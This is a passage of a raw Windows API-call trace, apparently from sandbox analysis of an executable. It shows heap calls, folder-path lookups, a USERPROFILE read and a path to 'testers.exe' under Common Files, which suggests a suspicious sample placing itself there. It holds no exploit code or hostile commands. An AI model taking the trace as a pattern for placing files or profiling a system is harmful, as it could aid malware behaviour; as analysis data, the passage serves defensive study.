| out: hHeap=0x8a0000) returned 1 [0155.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ddd68 | out: hHeap=0x8a0000) returned 1 [0155.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e16a0 | out: hHeap=0x8a0000) returned 1 [0155.065] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ddd68 [0155.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9910 [0155.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e16a0 [0155.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9910 | out: hHeap=0x8a0000) returned 1 [0155.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ddd90 [0155.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9910 [0155.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9928 [0155.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1700 [0155.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9928 | out: hHeap=0x8a0000) returned 1 [0155.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ddde0 [0155.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9928 [0155.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1780 [0155.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e2778 [0155.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1730 [0155.065] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x87f2e0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0155.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9be0 [0155.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1780 | out: hHeap=0x8a0000) returned 1 [0155.067] GetShortPathNameW (in: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpszShortPath=0x86f944, cchBuffer=0x7fff | out: lpszShortPath="C:\\Users\\5P5NRG~1\\Desktop") returned 0x19 [0155.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1780 [0155.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db018 [0155.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c40 [0155.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2778 | out: hHeap=0x8a0000) returned 1 [0155.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1730 | out: hHeap=0x8a0000) returned 1 [0155.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9be0 | out: hHeap=0x8a0000) returned 1 [0155.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9928 | out: hHeap=0x8a0000) returned 1 [0155.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ddde0 | out: hHeap=0x8a0000) returned 1 [0155.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1700 | out: hHeap=0x8a0000) returned 1 [0155.067] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.067] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ddde0 [0155.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9928 [0155.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1700 [0155.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9928 | out: hHeap=0x8a0000) returned 1 [0155.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ddcf0 [0155.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9928 [0155.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9be0 [0155.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1730 [0155.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9be0 | out: hHeap=0x8a0000) returned 1 [0155.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ddc78 [0155.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9be0 [0155.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1710 [0155.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e2778 [0155.068] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1740 [0155.068] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x87f2e0 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0155.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c58 [0155.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1710 | out: hHeap=0x8a0000) returned 1 [0155.073] GetShortPathNameW (in: lpszLongPath="C:\\Program Files (x86)", lpszShortPath=0x86f944, cchBuffer=0x7fff | out: lpszShortPath="C:\\PROGRA~2") returned 0xb [0155.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1710 [0155.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ddd40 [0155.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c28 [0155.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2778 | out: hHeap=0x8a0000) returned 1 [0155.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1740 | out: hHeap=0x8a0000) returned 1 [0155.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c58 | out: hHeap=0x8a0000) returned 1 [0155.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9be0 | out: hHeap=0x8a0000) returned 1 [0155.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ddc78 | out: hHeap=0x8a0000) returned 1 [0155.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1730 | out: hHeap=0x8a0000) returned 1 [0155.074] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ddc78 [0155.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9be0 [0155.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1730 [0155.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9be0 | out: hHeap=0x8a0000) returned 1 [0155.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ddcc8 [0155.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9be0 [0155.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c58 [0155.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1740 [0155.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c58 | out: hHeap=0x8a0000) returned 1 [0155.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ddd18 [0155.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c58 [0155.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1750 [0155.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e2778 [0155.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e16d0 [0155.074] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x87f500, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0155.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c10 [0155.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8dafd0 [0155.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e16b0 [0155.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2778 | out: hHeap=0x8a0000) returned 1 [0155.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e16d0 | out: hHeap=0x8a0000) returned 1 [0155.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1750 | out: hHeap=0x8a0000) returned 1 [0155.075] GetShortPathNameW (in: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpszShortPath=0x86f944, cchBuffer=0x7fff | out: lpszShortPath="C:\\Users\\5P5NRG~1") returned 0x11 [0155.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1750 [0155.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf2a0 [0155.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9bf8 [0155.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dafd0 | out: hHeap=0x8a0000) returned 1 [0155.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e16b0 | out: hHeap=0x8a0000) returned 1 [0155.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c10 | out: hHeap=0x8a0000) returned 1 [0155.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c58 | out: hHeap=0x8a0000) returned 1 [0155.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ddd18 | out: hHeap=0x8a0000) returned 1 [0155.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1740 | out: hHeap=0x8a0000) returned 1 [0155.075] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ddd18 [0155.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c58 [0155.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1740 [0155.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c58 | out: hHeap=0x8a0000) returned 1 [0155.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dde08 [0155.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c58 [0155.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c10 [0155.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e16b0 [0155.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c10 | out: hHeap=0x8a0000) returned 1 [0155.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dde30 [0155.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c10 [0155.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e16d0 [0155.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e2778 [0155.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e16f0 [0155.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b98 [0155.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2778 | out: hHeap=0x8a0000) returned 1 [0155.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e16f0 | out: hHeap=0x8a0000) returned 1 [0155.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e16d0 | out: hHeap=0x8a0000) returned 1 [0155.076] GetShortPathNameW (in: lpszLongPath="testers.exe", lpszShortPath=0x86f944, cchBuffer=0x7fff | out: lpszShortPath="C:\\Users\\5P5NRG~1") returned 0x0 [0155.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e16d0 [0155.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf1f8 [0155.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9af0 [0155.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf1f8 | out: hHeap=0x8a0000) returned 1 [0155.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e16d0 | out: hHeap=0x8a0000) returned 1 [0155.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b98 | out: hHeap=0x8a0000) returned 1 [0155.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c10 | out: hHeap=0x8a0000) returned 1 [0155.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dde30 | out: hHeap=0x8a0000) returned 1 [0155.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e16b0 | out: hHeap=0x8a0000) returned 1 [0155.077] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dde30 [0155.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c10 [0155.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e16b0 [0155.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c10 | out: hHeap=0x8a0000) returned 1 [0155.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dde58 [0155.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c10 [0155.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b98 [0155.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e16d0 [0155.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b98 | out: hHeap=0x8a0000) returned 1 [0155.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dde80 [0155.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b98 [0155.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e16f0 [0155.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e2778 [0155.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e16c0 [0155.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b99d0 [0155.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2778 | out: hHeap=0x8a0000) returned 1 [0155.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e16c0 | out: hHeap=0x8a0000) returned 1 [0155.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e16f0 | out: hHeap=0x8a0000) returned 1 [0155.078] GetShortPathNameW (in: lpszLongPath="C:\\Program Files (x86)\\Common Files\\testers.exe", lpszShortPath=0x86f944, cchBuffer=0x7fff | out: lpszShortPath="C:\\PROGRA~2\\COMMON~1\\testers.exe") returned 0x20 [0155.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e16f0 [0155.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923868 [0155.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9970 [0155.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b99d0 | out: hHeap=0x8a0000) returned 1 [0155.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b98 | out: hHeap=0x8a0000) returned 1 [0155.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dde80 | out: hHeap=0x8a0000) returned 1 [0155.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e16d0 | out: hHeap=0x8a0000) returned 1 [0155.079] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dde80 [0155.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b98 [0155.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e16d0 [0155.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b99d0 [0155.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9988 [0155.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e16c0 [0155.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9988 | out: hHeap=0x8a0000) returned 1 [0155.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e16e0 [0155.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf1f8 [0155.079] CharUpperBuffW (in: lpsz="PASSWORD_GENERATOR", cchLength=0x12 | out: lpsz="PASSWORD_GENERATOR") returned 0x12 [0155.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf1f8 | out: hHeap=0x8a0000) returned 1 [0155.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e16e0 | out: hHeap=0x8a0000) returned 1 [0155.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ddea8 [0155.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e16e0 [0155.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dded0 [0155.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9988 [0155.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1720 [0155.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a00 [0155.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1720 | out: hHeap=0x8a0000) returned 1 [0155.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1720 [0155.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b99a0 [0155.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1760 [0155.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b99b8 [0155.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1760 | out: hHeap=0x8a0000) returned 1 [0155.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b99e8 [0155.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ddef8 [0155.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b20 [0155.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1760 [0155.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b20 | out: hHeap=0x8a0000) returned 1 [0155.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ddf20 [0155.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b20 [0155.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b38 [0155.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ddf48 [0155.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b80 [0155.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0155.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b80 | out: hHeap=0x8a0000) returned 1 [0155.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ddf70 [0155.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b80 [0155.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0155.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8dafd0 [0155.080] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ddf98 [0155.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9bb0 [0155.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1790 [0155.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0155.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b08 [0155.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17a0 [0155.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17a0 | out: hHeap=0x8a0000) returned 1 [0155.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b08 | out: hHeap=0x8a0000) returned 1 [0155.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e17a0 [0155.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e2778 [0155.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17b0 [0155.081] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17c0 [0155.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17c0 | out: hHeap=0x8a0000) returned 1 [0155.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b08 [0155.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ad8 [0155.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9aa8 [0155.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e17c0 [0155.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17d0 [0155.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ac0 [0155.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17d0 | out: hHeap=0x8a0000) returned 1 [0155.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17d0 [0155.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17d0 | out: hHeap=0x8a0000) returned 1 [0155.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9aa8 | out: hHeap=0x8a0000) returned 1 [0155.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923810 [0155.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ac0 | out: hHeap=0x8a0000) returned 1 [0155.081] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17d0 [0155.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17d0 | out: hHeap=0x8a0000) returned 1 [0155.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ac0 [0155.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9aa8 [0155.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a78 [0155.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e17d0 [0155.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17e0 [0155.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0155.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17e0 | out: hHeap=0x8a0000) returned 1 [0155.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17e0 [0155.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17e0 | out: hHeap=0x8a0000) returned 1 [0155.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a78 | out: hHeap=0x8a0000) returned 1 [0155.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db060 [0155.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0155.082] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17e0 [0155.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0155.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17e0 | out: hHeap=0x8a0000) returned 1 [0155.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 